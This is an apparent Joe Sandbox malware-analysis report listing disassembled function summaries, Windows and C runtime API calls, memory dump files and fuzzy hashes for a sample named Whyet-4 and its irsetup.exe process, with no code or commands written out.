WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF676FA2C6C), ref: 00007FF676FA49C8
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF676FA2C6C), ref: 00007FF676FA4A03
free.LIBCMT ref: 00007FF676FA4A10
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF676FA2C6C), ref: 00007FF676FA4A1B
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF676FA2C6C), ref: 00007FF676FA4A29

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
String ID:
API String ID: 517548149-0
Opcode ID: 4f192c9dc046e425828ac888878adfb7fcee4b4893ec04fbb41d632eaf74bbd9
Instruction ID: 4604ce131985482699c09f7cb3dbf62fdd93b8feb938e0aa24d5156291944157
Opcode Fuzzy Hash: 4f192c9dc046e425828ac888878adfb7fcee4b4893ec04fbb41d632eaf74bbd9
Instruction Fuzzy Hash: 9E212133A29BC586EF649F11A50006977E6FB8ABC0B485034DA4E47758DF3DE455C704

Function 00007FF676FA3578 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF676FA3582
FlsGetValue.KERNEL32 ref: 00007FF676FA3590
SetLastError.KERNEL32 ref: 00007FF676FA35E8

Part of subcall function 00007FF676FA4E54: Sleep.KERNEL32 ref: 00007FF676FA4E99

FlsSetValue.KERNEL32 ref: 00007FF676FA35BC
free.LIBCMT ref: 00007FF676FA35DF

Part of subcall function 00007FF676FA34C0: _lock.LIBCMT ref: 00007FF676FA3514
Part of subcall function 00007FF676FA34C0: _lock.LIBCMT ref: 00007FF676FA3533

GetCurrentThreadId.KERNEL32 ref: 00007FF676FA35D0

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 070530a34a10f5dcc5882d25cfdaa8dc903071aa9d5905c5bd9c744f4c09bd1b
Instruction ID: ba2d59afd0200da89f1040880bef18b2602fa69d171ced819dd10913e83cf01a
Opcode Fuzzy Hash: 070530a34a10f5dcc5882d25cfdaa8dc903071aa9d5905c5bd9c744f4c09bd1b
Instruction Fuzzy Hash: B0012523E2D7CB46FE559F69D4541786293AF4A7A0B188235C93DC33D1DE3EE8448610

Function 00007FF676FA1908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF676FA1E80), ref: 00007FF676FA192B
GetProcAddress.KERNEL32(?,?,?,00007FF676FA1E80), ref: 00007FF676FA194D
FreeLibrary.KERNEL32(?,?,?,00007FF676FA1E80), ref: 00007FF676FA1965

Strings

Advapi32.dll, xrefs: 00007FF676FA191C
ConvertSidToStringSidA, xrefs: 00007FF676FA1943

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Advapi32.dll$ConvertSidToStringSidA
API String ID: 145871493-1798845326
Opcode ID: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction ID: b203970fe0f53491a726f68d4fd82a2eb789df77811248835bfc0159367ba50b
Opcode Fuzzy Hash: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction Fuzzy Hash: 23F08122B29FC589EE45DB16BA4013562A2AF4EFD0F488034EE6E83B48EF7DD455C300

Function 00007FF676FA6CF0 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF676FA6D4A
malloc.LIBCMT ref: 00007FF676FA6DAE
MultiByteToWideChar.KERNEL32 ref: 00007FF676FA6DF6
GetStringTypeW.KERNEL32 ref: 00007FF676FA6E0D
free.LIBCMT ref: 00007FF676FA6E21

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: b0951d1c0b7ea0b4d7a2c9a90dda24d34866409c1fd00f8feb7805da1ce37e69
Instruction ID: ded6b96726e21cbe317fcaa7f0eac1f65850761e1b33da5c7c1fc6b3a1faf560
Opcode Fuzzy Hash: b0951d1c0b7ea0b4d7a2c9a90dda24d34866409c1fd00f8feb7805da1ce37e69
Instruction Fuzzy Hash: 63418063A256C986EF108F2598005A96397FF46BE8F184635EE2D97BD4DF3DE405C340

Function 00007FF676FA3884 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA38AD
DecodePointer.KERNEL32(?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA38BD

Part of subcall function 00007FF676FA5C10: _errno.LIBCMT ref: 00007FF676FA5C19
Part of subcall function 00007FF676FA5C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF676FA5C24

EncodePointer.KERNEL32(?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA393B

Part of subcall function 00007FF676FA4ED8: realloc.LIBCMT ref: 00007FF676FA4F03
Part of subcall function 00007FF676FA4ED8: Sleep.KERNEL32(?,?,00000000,00007FF676FA392B,?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA4F1F

EncodePointer.KERNEL32(?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA394B
EncodePointer.KERNEL32(?,?,?,00007FF676FA3999,?,?,?,?,00007FF676FA2322), ref: 00007FF676FA3958

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction ID: 1659b692c6f24e7ca737488ce7eb50c6dbc558a675e7b869b83eb4b87125852f
Opcode Fuzzy Hash: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction Fuzzy Hash: F8217F23B2A6DA41EE009B51EA48179B393BF4ABC0F444835DA5ED7758DE7EE4958300

Function 00007FF676FA180C Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00007FF676FA1840
lstrcatA.KERNEL32 ref: 00007FF676FA185A
lstrlenA.KERNEL32 ref: 00007FF676FA1863
SetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA18B6
CreateDirectoryA.KERNEL32 ref: 00007FF676FA18C7

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: Directorylstrlen$CreateCurrentlstrcat
String ID:
API String ID: 279805598-0
Opcode ID: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction ID: a2aad04d3ff062dfc53081c6eb262d08f2284b8be55087da919e54d7386cdfa9
Opcode Fuzzy Hash: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction Fuzzy Hash: 43219523B2CBCA89FF21CB15E49427A6396FF4A784F858130CA8D83755DE6ED505C700

Function 00007FF676FA21AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF676FA21BB
GetProcAddress.KERNEL32 ref: 00007FF676FA21D0

Strings

CorExitProcess, xrefs: 00007FF676FA21C6
mscoree.dll, xrefs: 00007FF676FA21B4

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction ID: 4289768258f9477fa79066ef53e17e642d63ab5ffa03afd65678a39b1a166ccd
Opcode Fuzzy Hash: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction Fuzzy Hash: 99E01252F3668E82FF195B61AC4423412527F4B740B485039C92E87390EE6EED898350

Function 00007FF676FA2FF4 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF676FA3042
_invalid_parameter_noinfo.LIBCMT ref: 00007FF676FA304D
DecodePointer.KERNEL32(?,?,?,?,?,00007FF676FA4F78,?,?,?,?,00007FF676FA2F9E), ref: 00007FF676FA30FC
_lock.LIBCMT ref: 00007FF676FA3127

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction ID: 7ed191cbf0c295ae3bb06d7c5aea38d292ece0827f797497433845bf6987ffb5
Opcode Fuzzy Hash: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction Fuzzy Hash: 34517533E2C6CA46FE698B14E84127A6693EF87744F14853AD95EC3694CF3EF841C201

Function 00007FF676FA5644 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF676FA564E

Part of subcall function 00007FF676FA35FC: _amsg_exit.LIBCMT ref: 00007FF676FA3612

_lock.LIBCMT ref: 00007FF676FA567C
free.LIBCMT ref: 00007FF676FA56B2
_amsg_exit.LIBCMT ref: 00007FF676FA56EB

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 23db9903bf861fb168630996b7ef8a8dbce7089be7bf2da4b1eaf1e8c34edcee
Instruction ID: 0abe51e723c6f065632ea6e92817ada04118d2b95d046ae8fd4f08be9c39ab35
Opcode Fuzzy Hash: 23db9903bf861fb168630996b7ef8a8dbce7089be7bf2da4b1eaf1e8c34edcee
Instruction Fuzzy Hash: 82113023A296CA82EE949F14E9817B97363FF46740F0C0035DA1E87795CF2EE450CB10

Function 00007FF676FA5350 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF676FA5356

Part of subcall function 00007FF676FA35FC: _amsg_exit.LIBCMT ref: 00007FF676FA3612

_getptd.LIBCMT ref: 00007FF676FA5376
_lock.LIBCMT ref: 00007FF676FA5389
_amsg_exit.LIBCMT ref: 00007FF676FA53B7

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction ID: 63e921f38a708683a52aab9ea1a9c3ba592660559e7190f6b6c8c79c37864c2b
Opcode Fuzzy Hash: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
Instruction Fuzzy Hash: A6F0FF13A2A1CA85FE586B69C8427B81653AF86744F090138DA4DCB3D2DE5EE4409610

Analysis Process: irsetup.exePID: 5800, Parent PID: 4400COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	339
Total number of Limit Nodes:	13

Executed Functions

Function 0000000180029E74 Relevance: 10.6, APIs: 7, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018002D374: HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
Part of subcall function 000000018002D374: HeapSetInformation.KERNEL32 ref: 000000018002D3B0

_RTC_Initialize.LIBCMT ref: 0000000180029EA4
GetCommandLineA.KERNEL32 ref: 0000000180029EA9

Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F

Part of subcall function 000000018002C830: GetStartupInfoA.KERNEL32 ref: 000000018002C855

__setargv.LIBCMT ref: 0000000180029ED2
_cinit.LIBCMT ref: 0000000180029EE6

Part of subcall function 000000018002C178: FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
Part of subcall function 000000018002C178: free.LIBCMT ref: 000000018002D1AF
Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Part of subcall function 000000018002CB20: free.LIBCMT ref: 000000018002CB67

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32 ref: 0000000180029F6C
GetCurrentThreadId.KERNEL32 ref: 0000000180029F80
free.LIBCMT ref: 0000000180029F8F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
String ID:
API String ID: 1549890855-0
Opcode ID: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction ID: 5d89b5062d79ddf7cbf42b6751900f03d5044372f9c69ff6a2a4972f2435356c
Opcode Fuzzy Hash: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
Instruction Fuzzy Hash: CC315A3060260D85FEE7B7F096423FE13946F5D3D4F22C525B916852E7EE258B8C8322

Function 000000018002E8A4 Relevance: 9.1, APIs: 6, Instructions: 122
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_getptd.LIBCMT ref: 000000018002E8C3

Part of subcall function 000000018002E4E0: _getptd.LIBCMT ref: 000000018002E4EA

Part of subcall function 000000018002E59C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000018002E8DE,?,?,?,?,?,000000018002EAB3), ref: 000000018002E5C6

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

free.LIBCMT ref: 000000018002E94F

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

_lock.LIBCMT ref: 000000018002E987
free.LIBCMT ref: 000000018002EA37
free.LIBCMT ref: 000000018002EA67
_errno.LIBCMT ref: 000000018002EA6C

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 2878544890-0
Opcode ID: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction ID: c776ccf790241ac67246d89d90e9fa713756aa25b18aceaf8fd82d01af155c51
Opcode Fuzzy Hash: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
Instruction Fuzzy Hash: CB51B231600A8886E7E39B65A4403E9B7A1F78ABD8F14C216FA5E473A5CF78D649C701

Function 000000018002D374 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
HeapSetInformation.KERNEL32 ref: 000000018002D3B0

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction ID: d86c038a14694898d099bceb00610aad7d4d496ac8821e0f5eb4db07846aa6a7
Opcode Fuzzy Hash: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
Instruction Fuzzy Hash: 30E04F75621B84C2F7DAAB21E8457A66290F78C380F909029F94942B94DF7DC2498B00

Function 000000018002BF5C Relevance: 2.5, APIs: 2, Instructions: 30
sleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 000000018002BF7B

Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464

Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AllocHeapSleepmalloc
String ID:
API String ID: 496785850-0
Opcode ID: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction ID: ccdb5c5ed8c45f556dc77aec0225093e2b7ac281c4f631198e9e49a815c37d6e
Opcode Fuzzy Hash: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
Instruction Fuzzy Hash: 31F0FC32205A8C82E6D79F26E58036EB360F78CBD4F558124FA5D03795CF38CA958F00

Function 00000001800034F0 Relevance: 1.3, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00000001800034FF

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

